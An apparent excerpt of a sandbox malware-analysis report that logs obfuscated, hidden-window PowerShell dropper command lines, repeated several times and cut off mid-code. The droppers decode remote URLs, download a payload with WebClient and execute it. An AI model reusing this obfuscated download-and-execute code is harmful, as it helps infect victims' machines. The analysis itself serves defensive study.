L:Re/.l/IlcN.p.oaJunS.e lC.-Sma ndD.m ,iOpnT.h uoPesF t E..fcU.oKom.a/DeS PtN emevChnSts T1Ta7 C9Si.R mYoiAux.o ';$Arish=Viscometres 'Se>Re ';$Hemibasidiomycetes=Viscometres 'AmiGeePrxUd ';$Svaerd='Incisal';$dekanterendesndoneser = Viscometres 'w,er,cExh eoCh F %ReaInpCap dL aP,tU.aMo%H.\ChBLie.olAsi Un SdToaDe1Ch0 .3 .XoETofInt,t ,&Co& S SeMec EhS.o,i Gltuf ';Tilfredsstillelse (Viscometres 'Me$.ig olBloEdbGua.llD,:HiSEtt Mo AnS.e Er.foNioLatE = S(ArcTym.edWl M / rc U K$ ndD,e ,k GaKanEftI eOprT.e onOudHne.osTan,idPuo,on LeKes ieNurLs),f ');Tilfredsstillelse (Viscometres 'ta$Ovg klSpoKrbS aUnl ,:JoL ieH v de draneYed TeResBo=I.$ KBZia VgreeR,r,ei eePyr Eshy.TrsT,pErl.aitat,e( .$,oA .rRaiEnsSch O)Ph ');Tilfredsstillelse (Viscometres 'T,[JoN LeKrt.n.VaS e ur v,oiSic .eCaP,co Ki .nKntD,MFiacrn CaVagAse erR ] e:De:,oS eAfcHauFrrF iEntPryTaPLirBeoMet soPecM.o.il K Es=M ,d[ ONSte .tSj. ,SAfeN,cKruT r TiUntcoysoPSkr Aot t oHjc Ao,glBoTFiyBrpQ e.e] C:Va:U.T ,lS.s f1,r2.r ');$Bageriers=$Leveredes[0];$Varmeslangens= (Viscometres 'Cu$Dig wl DoP.bSkaVal :UiLC.iGeg eAnsIntO,iStl Ml ii SnSugFieB,r.nnF.e Lsda=DiNEneP wAn-woOskb TjB,eQ,cM.t PS.ayHus Nt.le Smdi.HiNcheCotfo.NoWExeSpb.mCT,l TiEmeDin Dt');$Varmeslangens+=$Stoneroot[1];Tilfredsstillelse ($Varmeslangens);Tilfredsstillelse (Viscometres 'Or$ oL Gi bgR,eG,sZit Cibrl.ul ,iT.nMigKleNorFonUne s r.GlHree DaPedDie,orBls.f[Af$KoMPaiFelTri se ,u sp Flora.unSte Fr,kn .e,a]Go=Me$MeA Bn,kn ,e PgHir keGat deFesJe ');$Mosegrundene=Viscometres ' E$ .LK.i.rg SeVus,etGii,olP lNei ,nGeg,oeMyrLinDreNas O.flD NoAlwInnSulhyoKraU.dSpFski PlS eKr(kr$ ,BFua cgBneFirReiSte,trHesBr,,r$BeR keFoh ,aRarLidIne ,nFu) D ';$Reharden=$Stoneroot[0];Tilfredsstillelse (Viscometres ',e$ g .lMoo Db ,aEnl R: HFShu osHaiTioEan Bs.daR,aMer.te HnDreNo=Vi(,yTWieVrsF t - .P sa.mt Mh s .o$SvR MePuhBra orRedSpeUnnRe) a ');while (!$Fusionsaarene) {Tilfredsstillelse (Viscometres 'Af$.ogEmlReo SbUna ,lLs: iNBroBon OsBioPrlReuPeb.nlClyFr=C.$MitRarLau eK ') ;Tilfredsstillelse $Mosegrundene;Tilfredsstillelse (Viscometres 'UnS tt Ma.ir Rt a- TSPilS eTreFap V ,
Source: C:\Windows\System32\cmd.exe	Process created: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe powershell.exe -windowstyle hidden "If (${host}.CurrentUICulture) {$Afgiftskolonners42nchamber='SUBsTR';$Apocrisiary++;}$Afgiftskolonners42nchamber+='ing';Function Indbandtes($Forsimple){$Afrettere=$Forsimple.Length-$Apocrisiary;For( $Afgiftskolonners42=2;$Afgiftskolonners42 -lt $Afrettere;$Afgiftskolonners42+=3){$Nedgangene+=$Forsimple.$Afgiftskolonners42nchamber.'Invoke'( $Afgiftskolonners42, $Apocrisiary);}$Nedgangene;}function Sloshily($Parasollernes){ & ($Paprr) ($Parasollernes);}$Velproevet=Indbandtes 'HeMB.o dzM,i.elFil Sa u/Sc5 P. G0Ry n( SW,oi.an.md,to Tw.hs . S.NS,TSe S1.o0Ar.He0Ca; H ,eWHji nnKi6 .4su;Pr TyxBo6,v4G ;Ke UlrD v A: ,1 D2 e1Ch.Pr0Di)Se ,rGr.e Mc ,kB.oFo/Se2Fe0Ca1 B0Su0R 1In0S,1R O,FSliInrMue SfduoAuxF./L,1Zi2Ar1R.. u0al ';$Hennes=Indbandtes ' ,UDisEpeA.rG -GgA eg ,ey.nBytB. ';$Reveled=Indbandtes 'SthF.tSetF.pHos.l:Po/.o/awa ,vUno,rcHyaRelofdNao Dp.oeT r huRe.idcNooC.m.r/NeJDrofyuCos .e ,4Ma. .p n BgA.>Mih.itQttDep os.o:Fr/In/R a vS.oGacSkapilO,dsoo ,p ,eBerS,u.ao enPreAn.SocR.oSymFj/ .JE,oCouArsVieB 4,d.Fap BnB,g , ';$Jejune203=Indbandtes 'Va>In ';$Paprr=Indbandtes 'B,iP,e hx H ';$Gushet='Zaristiske';$Ansvarsbevidsthed = Indbandtes 'FoeAac,vhGuo E Me%CoaG pJ pKudAdaS t Ba,u%,l\LiN ,eskgMalc.iL.gReeP.nBrt P.NoGN.a Bs S He& P& i ,oeA,cOmhB os. Ptul ';Sloshily (Indbandtes ' U$Prg GlVeo.eb a rlGl: .AObrS,n.pi Ln CgFoePa=S,( lc emSmdRe i./SicAl Fi$S,AAbn,as Av oaoprLasBub.reA v Si udalsPotHehUde .dRi) C ');Sloshily (Indbandtes 'Co$Deg TlTaoG.bpeaAclSu:MoBPalSeoJedS.s .kSma tmTesUnf,oo .rSphUnoAllM dInsP,=Sl$ MR Re fvEke rlcaeV dAd.Ves.lpU lPiiVatPa(Ta$DeJKoeDij.nu anSiefe2Ka0 ,3Se)Hy ');Sloshily (Indbandtes ' F[MoNUre tC .AlS.ee .r,hv Mi.kc ,e APLeoIniC,nPet,iMToaBln.eaApgHeeTrr t]D.:Es: eSBreAecKouObr.hisatTuyBePDrr Eo,rt.ao gc no lNa H,=Le M[FoNPae otOp. SChePac .uBerKiiPrtBey,cPt.r oButUnoRec Ho ,lF,TShyPop XeSl]Dr:K :S,T SlFosB.1Ir2To ');$Reveled=$Blodskamsforholds[0];$Lnindeholde= (Indbandtes ',o$ g.il SoRhbLia Kln,: AG Vn,uaChv,oeDer.hi.ee .t es =KaN.ceV.w e-lrOU,b OjTre,ocPrt TST yBls TtG.e FmKr.slNA.e.kt.e.MdW etrbDrCInlSoiAjeOvnGyt');$Lnindeholde+=$Arninge[1];Sloshily ($Lnindeholde);Sloshily (Indbandtes 'Fo$UnG Fn GaC,vFleAfrRaiAdePrt,hs S.KrHAdeDeaLsdS eNyr,rsGe[Ag$UnHK.e snVgnBre Us s]Ov= E$GuV ,eSclMop ,rDroVeer.v eCrtSk ');$Billardkers=Indbandtes 'Sa$.vGUnn,raCovAneU,r oiO,eCatLysn,.CoDCaoBrwP.nTel UoKoa kdRaF ri .lPreMe(.j$HaRNeeDrvO,eFal,nemed B,Fo$PaG Oe Mr omS.a unUniS.eS,sJ.) . ';$Germanies=$Arninge[0];Sloshily (Indbandtes 'Sa$TngSclWhoFob Ba AlC,: ,S .aSta,frE r TaBrnFrdCteMenRa4 c=Di(S T meflsOrt.r-StPScaOrt .hC lu$PrGSkePyr Fmasaman KiS.e,esK,)Bu ');while (!$Saarranden4) {Sloshily (Indbandtes 'Ly$,ugK.lF o sbSuaStlFo:AnN .oafn.yf.oaWevSeoA,r Ga ObEul,ue,r= .$SatM.r CuNoe T ') ;Sloshily $Billardkers;Sloshily (Indbandtes 'MuStotP.a,erU.t -BaS PlMieDueTep e G.4Tr ');Sloshily (Indbandtes 'ge$OvgBalU oRibanaCil H: GS.na	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process created: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe "C:\Windows\syswow64\WindowsPowerShell\v1.0\powershell.exe" "If (${host}.CurrentUICulture) {$Afgiftskolonners42nchamber='SUBsTR';$Apocrisiary++;}$Afgiftskolonners42nchamber+='ing';Function Indbandtes($Forsimple){$Afrettere=$Forsimple.Length-$Apocrisiary;For( $Afgiftskolonners42=2;$Afgiftskolonners42 -lt $Afrettere;$Afgiftskolonners42+=3){$Nedgangene+=$Forsimple.$Afgiftskolonners42nchamber.'Invoke'( $Afgiftskolonners42, $Apocrisiary);}$Nedgangene;}function Sloshily($Parasollernes){ & ($Paprr) ($Parasollernes);}$Velproevet=Indbandtes 'HeMB.o dzM,i.elFil Sa u/Sc5 P. G0Ry n( SW,oi.an.md,to Tw.hs . S.NS,TSe S1.o0Ar.He0Ca; H ,eWHji nnKi6 .4su;Pr TyxBo6,v4G ;Ke UlrD v A: ,1 D2 e1Ch.Pr0Di)Se ,rGr.e Mc ,kB.oFo/Se2Fe0Ca1 B0Su0R 1In0S,1R O,FSliInrMue SfduoAuxF./L,1Zi2Ar1R.. u0al ';$Hennes=Indbandtes ' ,UDisEpeA.rG -GgA eg ,ey.nBytB. ';$Reveled=Indbandtes 'SthF.tSetF.pHos.l:Po/.o/awa ,vUno,rcHyaRelofdNao Dp.oeT r huRe.idcNooC.m.r/NeJDrofyuCos .e ,4Ma. .p n BgA.>Mih.itQttDep os.o:Fr/In/R a vS.oGacSkapilO,dsoo ,p ,eBerS,u.ao enPreAn.SocR.oSymFj/ .JE,oCouArsVieB 4,d.Fap BnB,g , ';$Jejune203=Indbandtes 'Va>In ';$Paprr=Indbandtes 'B,iP,e hx H ';$Gushet='Zaristiske';$Ansvarsbevidsthed = Indbandtes 'FoeAac,vhGuo E Me%CoaG pJ pKudAdaS t Ba,u%,l\LiN ,eskgMalc.iL.gReeP.nBrt P.NoGN.a Bs S He& P& i ,oeA,cOmhB os. Ptul ';Sloshily (Indbandtes ' U$Prg GlVeo.eb a rlGl: .AObrS,n.pi Ln CgFoePa=S,( lc emSmdRe i./SicAl Fi$S,AAbn,as Av oaoprLasBub.reA v Si udalsPotHehUde .dRi) C ');Sloshily (Indbandtes 'Co$Deg TlTaoG.bpeaAclSu:MoBPalSeoJedS.s .kSma tmTesUnf,oo .rSphUnoAllM dInsP,=Sl$ MR Re fvEke rlcaeV dAd.Ves.lpU lPiiVatPa(Ta$DeJKoeDij.nu anSiefe2Ka0 ,3Se)Hy ');Sloshily (Indbandtes ' F[MoNUre tC .AlS.ee .r,hv Mi.kc ,e APLeoIniC,nPet,iMToaBln.eaApgHeeTrr t]D.:Es: eSBreAecKouObr.hisatTuyBePDrr Eo,rt.ao gc no lNa H,=Le M[FoNPae otOp. SChePac .uBerKiiPrtBey,cPt.r oButUnoRec Ho ,lF,TShyPop XeSl]Dr:K :S,T SlFosB.1Ir2To ');$Reveled=$Blodskamsforholds[0];$Lnindeholde= (Indbandtes ',o$ g.il SoRhbLia Kln,: AG Vn,uaChv,oeDer.hi.ee .t es =KaN.ceV.w e-lrOU,b OjTre,ocPrt TST yBls TtG.e FmKr.slNA.e.kt.e.MdW etrbDrCInlSoiAjeOvnGyt');$Lnindeholde+=$Arninge[1];Sloshily ($Lnindeholde);Sloshily (Indbandtes 'Fo$UnG Fn GaC,vFleAfrRaiAdePrt,hs S.KrHAdeDeaLsdS eNyr,rsGe[Ag$UnHK.e snVgnBre Us s]Ov= E$GuV ,eSclMop ,rDroVeer.v eCrtSk ');$Billardkers=Indbandtes 'Sa$.vGUnn,raCovAneU,r oiO,eCatLysn,.CoDCaoBrwP.nTel UoKoa kdRaF ri .lPreMe(.j$HaRNeeDrvO,eFal,nemed B,Fo$PaG Oe Mr omS.a unUniS.eS,sJ.) . ';$Germanies=$Arninge[0];Sloshily (Indbandtes 'Sa$TngSclWhoFob Ba AlC,: ,S .aSta,frE r TaBrnFrdCteMenRa4 c=Di(S T meflsOrt.r-StPScaOrt .hC lu$PrGSkePyr Fmasaman KiS.e,esK,)Bu ');while (!$Saarranden4) {Sloshily (Indbandtes 'Ly$,ugK.lF o sbSuaStlFo:AnN .oafn.yf.oaWevSeoA,r Ga ObEul,ue,r= .$SatM.r CuNoe T ') ;Sloshily $Billardkers;Sloshily (Indbandtes 'MuStotP.a,erU.t -BaS PlMieDueTep e G.4Tr ');Sloshily (Indbandtes 'ge$Ovg	Jump to behavior
Source: C:\Windows\SysWOW64\wscript.exe	Process created: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe "C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" "If (${host}.CurrentUICulture) {$alismataceae='SUBsTR';$Lotah++;}$alismataceae+='ing';Function Viscometres($Rubellosis){$Overdaadigt=$Rubellosis.Length-$Lotah;For( $dekanterendes=2;$dekanterendes -lt $Overdaadigt;$dekanterendes+=3){$Firblads159+=$Rubellosis.$alismataceae.'Invoke'( $dekanterendes, $Lotah);}$Firblads159;}function Tilfredsstillelse($konerne){ . ($Hemibasidiomycetes) ($konerne);}$Annegretes=Viscometres 'BuMVio.lzNyiEfl,ilPraPr/Sn5Te.Fr0f ,l(gaW Ti.anSpds o,aw asFi h N aTAs z1,a0Sy.ud0Bi;bi TpW ,iOpnV,6Te4 C; r Bix P6Ud4Ng; ,trUnv ,: .1Sk2,r1,l.Di0Va),n ,GPre .cSkk oG,/Sm2Fa0R.1Ug0 .0ap1So0 R1Ge VeFS.iSar deStfrioRaxKu/ 1 P2,h1Os. .0 , ';$Milieuplanerne=Viscometres 'YoUVesLreTerPr-W A,rgRhe,yn,ct.u ';$Bageriers=Viscometres 'EnhFotAnt p L:Re/.l/IlcN.p.oaJunS.e lC.-Sma ndD.m ,iOpnT.h uoPesF t E..fcU.oKom.a/DeS PtN emevChnSts T1Ta7 C9Si.R mYoiAux.o ';$Arish=Viscometres 'Se>Re ';$Hemibasidiomycetes=Viscometres 'AmiGeePrxUd ';$Svaerd='Incisal';$dekanterendesndoneser = Viscometres 'w,er,cExh eoCh F %ReaInpCap dL aP,tU.aMo%H.\ChBLie.olAsi Un SdToaDe1Ch0 .3 .XoETofInt,t ,&Co& S SeMec EhS.o,i Gltuf ';Tilfredsstillelse (Viscometres 'Me$.ig olBloEdbGua.llD,:HiSEtt Mo AnS.e Er.foNioLatE = S(ArcTym.edWl M / rc U K$ ndD,e ,k GaKanEftI eOprT.e onOudHne.osTan,idPuo,on LeKes ieNurLs),f ');Tilfredsstillelse (Viscometres 'ta$Ovg klSpoKrbS aUnl ,:JoL ieH v de draneYed TeResBo=I.$ KBZia VgreeR,r,ei eePyr Eshy.TrsT,pErl.aitat,e( .$,oA .rRaiEnsSch O)Ph ');Tilfredsstillelse (Viscometres 'T,[JoN LeKrt.n.VaS e ur v,oiSic .eCaP,co Ki .nKntD,MFiacrn CaVagAse erR ] e:De:,oS eAfcHauFrrF iEntPryTaPLirBeoMet soPecM.o.il K Es=M ,d[ ONSte .tSj. ,SAfeN,cKruT r TiUntcoysoPSkr Aot t oHjc Ao,glBoTFiyBrpQ e.e] C:Va:U.T ,lS.s f1,r2.r ');$Bageriers=$Leveredes[0];$Varmeslangens= (Viscometres 'Cu$Dig wl DoP.bSkaVal :UiLC.iGeg eAnsIntO,iStl Ml ii SnSugFieB,r.nnF.e Lsda=DiNEneP wAn-woOskb TjB,eQ,cM.t PS.ayHus Nt.le Smdi.HiNcheCotfo.NoWExeSpb.mCT,l TiEmeDin Dt');$Varmeslangens+=$Stoneroot[1];Tilfredsstillelse ($Varmeslangens);Tilfredsstillelse (Viscometres 'Or$ oL Gi bgR,eG,sZit Cibrl.ul ,iT.nMigKleNorFonUne s r.GlHree DaPedDie,orBls.f[Af$KoMPaiFelTri se ,u sp Flora.unSte Fr,kn .e,a]Go=Me$MeA Bn,kn ,e PgHir keGat deFesJe ');$Mosegrundene=Viscometres ' E$ .LK.i.rg SeVus,etGii,olP lNei ,nGeg,oeMyrLinDreNas O.flD NoAlwInnSulhyoKraU.dSpFski PlS eKr(kr$ ,BFua cgBneFirReiSte,trHesBr,,r$BeR keFoh ,aRarLidIne ,nFu) D ';$Reharden=$Stoneroot[0];Tilfredsstillelse (Viscometres ',e$ g .lMoo Db ,aEnl R: HFShu osHaiTioEan Bs.daR,aMer.te HnDreNo=Vi(,yTWieVrsF t - .P sa.mt Mh s .o$SvR MePuhBra orRedSpeUnnRe) a ');while (!$Fusionsaarene) {Tilfredsstillelse (Viscometres 'Af$.ogEmlReo SbUna ,lLs: iNBroBon OsBioPrlReuPeb.nlClyFr=C.$MitRarLau eK ') ;Tilfredsstillelse $Mosegrundene;Tilfredsstillelse (Viscometres 'UnS tt Ma.ir Rt a- TSPilS eTreFap V ,	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Process created: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe "C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" "If (${host}.CurrentUICulture) {$alismataceae='SUBsTR';$Lotah++;}$alismataceae+='ing';Function Viscometres($Rubellosis){$Overdaadigt=$Rubellosis.Length-$Lotah;For( $dekanterendes=2;$dekanterendes -lt $Overdaadigt;$dekanterendes+=3){$Firblads159+=$Rubellosis.$alismataceae.'Invoke'( $dekanterendes, $Lotah);}$Firblads159;}function Tilfredsstillelse($konerne){ . ($Hemibasidiomycetes) ($konerne);}$Annegretes=Viscometres 'BuMVio.lzNyiEfl,ilPraPr/Sn5Te.Fr0f ,l(gaW Ti.anSpds o,aw asFi h N aTAs z1,a0Sy.ud0Bi;bi TpW ,iOpnV,6Te4 C; r Bix P6Ud4Ng; ,trUnv ,: .1Sk2,r1,l.Di0Va),n ,GPre .cSkk oG,/Sm2Fa0R.1Ug0 .0ap1So0 R1Ge VeFS.iSar deStfrioRaxKu/ 1 P2,h1Os. .0 , ';$Milieuplanerne=Viscometres 'YoUVesLreTerPr-W A,rgRhe,yn,ct.u ';$Bageriers=Viscometres 'EnhFotAnt p L:Re/.l/IlcN.p.oaJunS.e lC.-Sma ndD.m ,iOpnT.h uoPesF t E..fcU.oKom.a/DeS PtN emevChnSts T1Ta7 C9Si.R mYoiAux.o ';$Arish=Viscometres 'Se>Re ';$Hemibasidiomycetes=Viscometres 'AmiGeePrxUd ';$Svaerd='Incisal';$dekanterendesndoneser = Viscometres 'w,er,cExh eoCh F %ReaInpCap dL aP,tU.aMo%H.\ChBLie.olAsi Un SdToaDe1Ch0 .3 .XoETofInt,t ,&Co& S SeMec EhS.o,i Gltuf ';Tilfredsstillelse (Viscometres 'Me$.ig olBloEdbGua.llD,:HiSEtt Mo AnS.e Er.foNioLatE = S(ArcTym.edWl M / rc U K$ ndD,e ,k GaKanEftI eOprT.e onOudHne.osTan,idPuo,on LeKes ieNurLs),f ');Tilfredsstillelse (Viscometres 'ta$Ovg klSpoKrbS aUnl ,:JoL ieH v de draneYed TeResBo=I.$ KBZia VgreeR,r,ei eePyr Eshy.TrsT,pErl.aitat,e( .$,oA .rRaiEnsSch O)Ph ');Tilfredsstillelse (Viscometres 'T,[JoN LeKrt.n.VaS e ur v,oiSic .eCaP,co Ki .nKntD,MFiacrn CaVagAse erR ] e:De:,oS eAfcHauFrrF iEntPryTaPLirBeoMet soPecM.o.il K Es=M ,d[ ONSte .tSj. ,SAfeN,cKruT r TiUntcoysoPSkr Aot t oHjc Ao,glBoTFiyBrpQ e.e] C:Va:U.T ,lS.s f1,r2.r ');$Bageriers=$Leveredes[0];$Varmeslangens= (Viscometres 'Cu$Dig wl DoP.bSkaVal :UiLC.iGeg eAnsIntO,iStl Ml ii SnSugFieB,r.nnF.e Lsda=DiNEneP wAn-woOskb TjB,eQ,cM.t PS.ayHus Nt.le Smdi.HiNcheCotfo.NoWExeSpb.mCT,l TiEmeDin Dt');$Varmeslangens+=$Stoneroot[1];Tilfredsstillelse ($Varmeslangens);Tilfredsstillelse (Viscometres 'Or$ oL Gi bgR,eG,sZit Cibrl.ul ,iT.nMigKleNorFonUne s r.GlHree DaPedDie,orBls.f[Af$KoMPaiFelTri se ,u sp Flora.unSte Fr,kn .e,a]Go=Me$MeA Bn,kn ,e PgHir keGat deFesJe ');$Mosegrundene=Viscometres ' E$ .LK.i.rg SeVus,etGii,olP lNei ,nGeg,oeMyrLinDreNas O.flD NoAlwInnSulhyoKraU.dSpFski PlS eKr(kr$ ,BFua cgBneFirReiSte,trHesBr,,r$BeR keFoh ,aRarLidIne ,nFu) D ';$Reharden=$Stoneroot[0];Tilfredsstillelse (Viscometres ',e$ g .lMoo Db ,aEnl R: HFShu osHaiTioEan Bs.daR,aMer.te HnDreNo=Vi(,yTWieVrsF t - .P sa.mt Mh s .o$SvR MePuhBra orRedSpeUnnRe) a ');while (!$Fusionsaarene) {Tilfredsstillelse (Viscometres 'Af$.ogEmlReo SbUna ,lLs: iNBroBon OsBioPrlReuPeb.nlClyFr=C.$MitRarLau eK ') ;Tilfredsstillelse $Mosegrundene;Tilfredsstillelse (Viscometres 'UnS tt Ma.ir Rt a- TSPilS eTreFap V ,

Suspicious powershell command line found

Source: C:\Windows\System32\cmd.exe	Process created: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe powershell.exe -windowstyle hidden "If (${host}.CurrentUICulture) {$Afgiftskolonners42nchamber='SUBsTR';$Apocrisiary++;}$Afgiftskolonners42nchamber+='ing';Function Indbandtes($Forsimple){$Afrettere=$Forsimple.Length-$Apocrisiary;For( $Afgiftskolonners42=2;$Afgiftskolonners42 -lt $Afrettere;$Afgiftskolonners42+=3){$Nedgangene+=$Forsimple.$Afgiftskolonners42nchamber.'Invoke'( $Afgiftskolonners42, $Apocrisiary);}$Nedgangene;}function Sloshily($Parasollernes){ & ($Paprr) ($Parasollernes);}$Velproevet=Indbandtes 'HeMB.o dzM,i.elFil Sa u/Sc5 P. G0Ry n( SW,oi.an.md,to Tw.hs . S.NS,TSe S1.o0Ar.He0Ca; H ,eWHji nnKi6 .4su;Pr TyxBo6,v4G ;Ke UlrD v A: ,1 D2 e1Ch.Pr0Di)Se ,rGr.e Mc ,kB.oFo/Se2Fe0Ca1 B0Su0R 1In0S,1R O,FSliInrMue SfduoAuxF./L,1Zi2Ar1R.. u0al ';$Hennes=Indbandtes ' ,UDisEpeA.rG -GgA eg ,ey.nBytB. ';$Reveled=Indbandtes 'SthF.tSetF.pHos.l:Po/.o/awa ,vUno,rcHyaRelofdNao Dp.oeT r huRe.idcNooC.m.r/NeJDrofyuCos .e ,4Ma. .p n BgA.>Mih.itQttDep os.o:Fr/In/R a vS.oGacSkapilO,dsoo ,p ,eBerS,u.ao enPreAn.SocR.oSymFj/ .JE,oCouArsVieB 4,d.Fap BnB,g , ';$Jejune203=Indbandtes 'Va>In ';$Paprr=Indbandtes 'B,iP,e hx H ';$Gushet='Zaristiske';$Ansvarsbevidsthed = Indbandtes 'FoeAac,vhGuo E Me%CoaG pJ pKudAdaS t Ba,u%,l\LiN ,eskgMalc.iL.gReeP.nBrt P.NoGN.a Bs S He& P& i ,oeA,cOmhB os. Ptul ';Sloshily (Indbandtes ' U$Prg GlVeo.eb a rlGl: .AObrS,n.pi Ln CgFoePa=S,( lc emSmdRe i./SicAl Fi$S,AAbn,as Av oaoprLasBub.reA v Si udalsPotHehUde .dRi) C ');Sloshily (Indbandtes 'Co$Deg TlTaoG.bpeaAclSu:MoBPalSeoJedS.s .kSma tmTesUnf,oo .rSphUnoAllM dInsP,=Sl$ MR Re fvEke rlcaeV dAd.Ves.lpU lPiiVatPa(Ta$DeJKoeDij.nu anSiefe2Ka0 ,3Se)Hy ');Sloshily (Indbandtes ' F[MoNUre tC .AlS.ee .r,hv Mi.kc ,e APLeoIniC,nPet,iMToaBln.eaApgHeeTrr t]D.:Es: eSBreAecKouObr.hisatTuyBePDrr Eo,rt.ao gc no lNa H,=Le M[FoNPae otOp. SChePac .uBerKiiPrtBey,cPt.r oButUnoRec Ho ,lF,TShyPop XeSl]Dr:K :S,T SlFosB.1Ir2To ');$Reveled=$Blodskamsforholds[0];$Lnindeholde= (Indbandtes ',o$ g.il SoRhbLia Kln,: AG Vn,uaChv,oeDer.hi.ee .t es =KaN.ceV.w e-lrOU,b OjTre,ocPrt TST yBls TtG.e FmKr.slNA.e.kt.e.MdW etrbDrCInlSoiAjeOvnGyt');$Lnindeholde+=$Arninge[1];Sloshily ($Lnindeholde);Sloshily (Indbandtes 'Fo$UnG Fn GaC,vFleAfrRaiAdePrt,hs S.KrHAdeDeaLsdS eNyr,rsGe[Ag$UnHK.e snVgnBre Us s]Ov= E$GuV ,eSclMop ,rDroVeer.v eCrtSk ');$Billardkers=Indbandtes 'Sa$.vGUnn,raCovAneU,r oiO,eCatLysn,.CoDCaoBrwP.nTel UoKoa kdRaF ri .lPreMe(.j$HaRNeeDrvO,eFal,nemed B,Fo$PaG Oe Mr omS.a unUniS.eS,sJ.) . ';$Germanies=$Arninge[0];Sloshily (Indbandtes 'Sa$TngSclWhoFob Ba AlC,: ,S .aSta,frE r TaBrnFrdCteMenRa4 c=Di(S T meflsOrt.r-StPScaOrt .hC lu$PrGSkePyr Fmasaman KiS.e,esK,)Bu ');while (!$Saarranden4) {Sloshily (Indbandtes 'Ly$,ugK.lF o sbSuaStlFo:AnN .oafn.yf.oaWevSeoA,r Ga ObEul,ue,r= .$SatM.r CuNoe T ') ;Sloshily $Billardkers;Sloshily (Indbandtes 'MuStotP.a,erU.t -BaS PlMieDueTep e G.4Tr ');Sloshily (Indbandtes 'ge$OvgBalU oRibanaCil H: GS.na
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process created: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe "C:\Windows\syswow64\WindowsPowerShell\v1.0\powershell.exe" "If (${host}.CurrentUICulture) {$Afgiftskolonners42nchamber='SUBsTR';$Apocrisiary++;}$Afgiftskolonners42nchamber+='ing';Function Indbandtes($Forsimple){$Afrettere=$Forsimple.Length-$Apocrisiary;For( $Afgiftskolonners42=2;$Afgiftskolonners42 -lt $Afrettere;$Afgiftskolonners42+=3){$Nedgangene+=$Forsimple.$Afgiftskolonners42nchamber.'Invoke'( $Afgiftskolonners42, $Apocrisiary);}$Nedgangene;}function Sloshily($Parasollernes){ & ($Paprr) ($Parasollernes);}$Velproevet=Indbandtes 'HeMB.o dzM,i.elFil Sa u/Sc5 P. G0Ry n( SW,oi.an.md,to Tw.hs . S.NS,TSe S1.o0Ar.He0Ca; H ,eWHji nnKi6 .4su;Pr TyxBo6,v4G ;Ke UlrD v A: ,1 D2 e1Ch.Pr0Di)Se ,rGr.e Mc ,kB.oFo/Se2Fe0Ca1 B0Su0R 1In0S,1R O,FSliInrMue SfduoAuxF./L,1Zi2Ar1R.. u0al ';$Hennes=Indbandtes ' ,UDisEpeA.rG -GgA eg ,ey.nBytB. ';$Reveled=Indbandtes 'SthF.tSetF.pHos.l:Po/.o/awa ,vUno,rcHyaRelofdNao Dp.oeT r huRe.idcNooC.m.r/NeJDrofyuCos .e ,4Ma. .p n BgA.>Mih.itQttDep os.o:Fr/In/R a vS.oGacSkapilO,dsoo ,p ,eBerS,u.ao enPreAn.SocR.oSymFj/ .JE,oCouArsVieB 4,d.Fap BnB,g , ';$Jejune203=Indbandtes 'Va>In ';$Paprr=Indbandtes 'B,iP,e hx H ';$Gushet='Zaristiske';$Ansvarsbevidsthed = Indbandtes 'FoeAac,vhGuo E Me%CoaG pJ pKudAdaS t Ba,u%,l\LiN ,eskgMalc.iL.gReeP.nBrt P.NoGN.a Bs S He& P& i ,oeA,cOmhB os. Ptul ';Sloshily (Indbandtes ' U$Prg GlVeo.eb a rlGl: .AObrS,n.pi Ln CgFoePa=S,( lc emSmdRe i./SicAl Fi$S,AAbn,as Av oaoprLasBub.reA v Si udalsPotHehUde .dRi) C ');Sloshily (Indbandtes 'Co$Deg TlTaoG.bpeaAclSu:MoBPalSeoJedS.s .kSma tmTesUnf,oo .rSphUnoAllM dInsP,=Sl$ MR Re fvEke rlcaeV dAd.Ves.lpU lPiiVatPa(Ta$DeJKoeDij.nu anSiefe2Ka0 ,3Se)Hy ');Sloshily (Indbandtes ' F[MoNUre tC .AlS.ee .r,hv Mi.kc ,e APLeoIniC,nPet,iMToaBln.eaApgHeeTrr t]D.:Es: eSBreAecKouObr.hisatTuyBePDrr Eo,rt.ao gc no lNa H,=Le M[FoNPae otOp. SChePac .uBerKiiPrtBey,cPt.r oButUnoRec Ho ,lF,TShyPop XeSl]Dr:K :S,T SlFosB.1Ir2To ');$Reveled=$Blodskamsforholds[0];$Lnindeholde= (Indbandtes ',o$ g.il SoRhbLia Kln,: AG Vn,uaChv,oeDer.hi.ee .t es =KaN.ceV.w e-lrOU,b OjTre,ocPrt TST yBls TtG.e FmKr.slNA.e.kt.e.MdW etrbDrCInlSoiAjeOvnGyt');$Lnindeholde+=$Arninge[1];Sloshily ($Lnindeholde);Sloshily (Indbandtes 'Fo$UnG Fn GaC,vFleAfrRaiAdePrt,hs S.KrHAdeDeaLsdS eNyr,rsGe[Ag$UnHK.e snVgnBre Us s]Ov= E$GuV ,eSclMop ,rDroVeer.v eCrtSk ');$Billardkers=Indbandtes 'Sa$.vGUnn,raCovAneU,r oiO,eCatLysn,.CoDCaoBrwP.nTel UoKoa kdRaF ri .lPreMe(.j$HaRNeeDrvO,eFal,nemed B,Fo$PaG Oe Mr omS.a unUniS.eS,sJ.) . ';$Germanies=$Arninge[0];Sloshily (Indbandtes 'Sa$TngSclWhoFob Ba AlC,: ,S .aSta,frE r TaBrnFrdCteMenRa4 c=Di(S T meflsOrt.r-StPScaOrt .hC lu$PrGSkePyr Fmasaman KiS.e,esK,)Bu ');while (!$Saarranden4) {Sloshily (Indbandtes 'Ly$,ugK.lF o sbSuaStlFo:AnN .oafn.yf.oaWevSeoA,r Ga ObEul,ue,r= .$SatM.r CuNoe T ') ;Sloshily $Billardkers;Sloshily (Indbandtes 'MuStotP.a,erU.t -BaS PlMieDueTep e G.4Tr ');Sloshily (Indbandtes 'ge$Ovg
